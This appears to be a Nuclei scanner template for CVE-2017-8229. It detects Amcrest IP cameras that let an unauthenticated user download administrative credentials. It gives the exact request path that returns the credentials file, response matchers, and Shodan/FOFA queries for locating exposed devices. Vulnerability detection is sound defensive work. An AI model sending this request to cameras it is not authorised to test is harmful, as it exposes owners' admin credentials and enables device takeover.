nuclei-templates/http/cves/2017/CVE-2017-8229.yaml

46 lines
1.2 KiB
YAML

id: CVE-2017-8229
info:
name: Amcrest IP Camera Web Management - Data Exposure
author: pussycat0x
severity: critical
description: |
Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
- http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
- https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-255
metadata:
max-request: 1
fofa-query: "Amcrest"
shodan-query: html:"Amcrest"
verified: true
tags: cve,cve2017,amcrest,iot
http:
- method: GET
path:
- "{{BaseURL}}/current_config/Sha1Account1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DevInformation"
- "SerialID"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200